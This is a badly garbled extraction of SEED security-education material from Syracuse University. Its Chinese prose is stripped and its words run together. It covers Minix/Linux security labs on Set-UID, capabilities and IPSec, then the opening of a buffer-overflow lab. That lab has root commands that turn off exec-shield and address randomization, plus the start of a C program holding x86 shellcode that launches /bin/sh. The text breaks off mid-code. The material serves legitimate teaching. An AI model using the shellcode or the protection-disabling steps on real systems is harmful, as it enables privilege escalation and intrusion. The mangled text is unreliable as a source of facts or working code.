杜文亮-网络安全实验

SEED(Du,Wenliang),Ph.D.AssociateProfessor(SyracuseUniversity),USA.Email:wedu@syr.eduTel:+1315-443-9180URL:~wedu/seed/(Jiang,Jianchun)Ph.D.AssociateProfessor(Wen,Weiping)Ph.D.AssociateProfessor1SIGCSE’0712182Return-to-libc153234275Chroot316TCP/IP347DNS368403/1442503544615Set-RandomUID656IPSec6777441Set-UID782SYN-Cookie825861CopyrightStatementCopyright©2006–2009WenliangDu,SyracuseUniversity.ThedevelopmentofthisdocumentisfundedbytheNationalScienceFoundation’sCourse,Curriculum,andLaboratoryImprovement(CCLI)programunderAwardNo.0618680and0231122.Permissionisgrantedtocopy,distributeand/ormodifythisdocumentunderthetermsoftheGNUFreeDocumentationLicense,Version1.2oranylaterversionpublishedbytheFreeSoftwareFoundation.Acopyofthelicensecanbefoundat://(Kevin)DuCST4-206Email:wedu@ecs.syr.eduTel:315-443-9180URL:~wedu/seed/SEEDMinixLinux10SEEDSEEDK.3.21195119522003568SEEDSEcurityEDucationSEED1SEED2SEED2393SEEDSEEDSEEDSEED32SEED(1)(2)(3)(4)(5)234/LinuxWindowsMinix[9]Nachos[2]Xinu[3]miniJava[1][2,3,9]SEEDMinixMinixSEEDLinuxVirtualMachinesMinixLinuxMinixLinuxVMwareVirtualPCVMwareVMwareMinixLinuxSEEDSEEDSEED85%15%300MB1GB1003SEEDSEED(1)4Minix(2)MinixLinux3.1Set-UIDSet-UIDMinixSet-UIDSet-UIDSet-UIDUnixSet-UIDrootrootSet-UIDMinixLinuxSet-UIDSet-UIDLinuxMinix1Set-UIDchsh,passwd,suSet-UIDMinixSet-UID2Set-UID(constchar*cmd)(cmd)/bin/shshellcmdshellsetuidrootSet-UIDsystemshellPATHSet-UIDlsSet-UID/bin/lslsSet-UID/bin/lsMinixLinux3system()execve()Set-UIDlssystem()shellexecve()MinixLinux4Set-UIDsetuid()rootrootrootSet-UID()MinixLinux2LinuxMinixLinuxshell/bin/shSet-UIDMinixLinux53.2capabilityUnixSet-UIDrootrootrootSet-UIDTrustedSolaris8root80rootLinuxMinix55rootSet-UIDSet-UID:1.CAP_READ:ACL2.CAP_CHOWN:3.CAP_SETUID:idsetuid()seteuid()4.CAP_KILL:id5.CAP_SYS_REBOOT:CAP_SETUID/MinixMinixMinixi-nodesi-node3.3IPSecIPSecIPSecIETFIP(VPNs)IPSecOSMinixIPSecIPSec6IPSecIPSecESPAHTunnelingTransportTunnelingESPIPSecAESIPSecIPSecIKE(InternetKeyExchange)5IPIPTCP/IP3.4(EFS)EFSEFS/EFSSolaris,WindowsNTLinuxMinixEFS4-5RBACRBACFedoraLinuxTrustedSolaris.RBACunixchrootjailchrootMinixLinuxMinixMinix4(A)(B)(C)(D),(E)Set-UID,capabilityIPSec153011CIPSecMinixIP7235123455SEEDMinixLinuxSEED10SEED6[1]A.W.AppelandJ.Palsberg.ModernCompilerImplementationinJava.Number0-521-82060-X.CambridgeUniversityPress,2ndedition,2002.[2]W.A.Christopher,S.J.Procter,andT.E.Anderson.TheNachosinstructionaloperatingsystem.InProceedingsoftheWinter1993USENIXConference,pages481–489,SanDiego,CA,January,25-291993.[3]D.Comer.OperatingSystemDesign:theXINUApproach.PrenticeHall,1984.[4]P.J.Denning.Greatprinciplesofcomputing.CommunicationsoftheACM,46(11):15–20,2003.[5]J.M.D.Hill,C.A.Carver,Jr.,J.W.Humphries,andU.W.Pooch.Usinganisolatednetworklaboratorytoteachadvancednetworksandsecurity.InProc.ofthe32ndSIGCSETechnicalSymposiumonComputerScienceEducation,Charlotte,NC,Feb.2001.[6]C.E.Irvine,T.E.Levin,T.D.Nguyen,andG.W.Dinolt.Thetrustedcomputingexemplarproject.InProc.ofthe2004IEEE8SystemsManandCyberneticsInformationAssuranceWorkshop,June2004.[7]D.Kolb.Experientiallearning:Experienceasthesourceoflearninganddevelopment.PrenticeHall,EnglewoodClis,NJ,1984.[8]W.G.MitchenerandA.Vahdat.Achatroomassignmentforteachingnetworksecurity.InProc.Ofthe32ndSIGCSEtechnicalsymposiumonComputerScienceEducation,Charlotte,NC,2001.[9]A.S.TanenbaumandA.S.Woodhull.OperatingSystemsDesignandImplementation.PrenticeHall,2ndedition,1997.9122.1FedoraLinuxFedoraFedorashellcodeFedora$surootPassword:(enterrootpassword)#/sbin/sysctl-wkernel.exec-shield=0#/sbin/sysctl-wkernel.randomize_va_space=0shellshellSet-UIDshellshell/bin/basFedora/bin/sh/bin/bashshellzsh/bin/bashzsh$suPassword:(enterrootpassword)#wget(continueonthenextline)core/4/i386/os/Fedora/RPMS/zsh-4.2.1-2.i386.rpm#rpm-ivhzsh-4.2.1-2.i386.rpmCopyright©2006WenliangDu,SyracuseUniversity.ThedevelopmentofthisdocumentisfundedbytheNationalScienceFoundation’sCourse,Curriculum,andLaboratoryImprovement(CCLI)programunderAwardNo.0618680and0231122.Permissionisgrantedtocopy,distributeand/ormodifythisdocumentunderthetermsoftheGNUFreeDocumentationLicense,Version1.2oranylaterversionpublishedbytheFreeSoftwareFoundation.Acopyofthelicensecanbefoundat(){char*name[2];name[0]=‘‘/bin/sh’’;name[1]=NULL;execve(name[0],name,NULL);}shellcodeshellcodeshellshell/*call_shellcode.c*//*Aprogramthatcreatesafilecontainingcodeforlaunchingshell*/#includestdlib.h#includestdio.hconstcharcode[]=\x31\xc0/*Line1:xorl%eax,%eax*/\x50/*Line2:pushl%eax*/\x68//sh/*Line3:pushl$0x68732f2f*/\x68/bin/*Line4:pushl$0x6e69622f*/\x89\xe3/*Line5:movl%esp,%ebx*/\x50/*Line6:pushl%eax*/\x53/*Line7:pushl%ebx*/\x89\xe1/*Line8:movl%esp,%ecx*/\x99/*Line9:cdql*/\xb0\x0b/*Line10:movb$0x0b,%al*/\xcd\x80/*Line11:int$0x80*/;intmain(intarg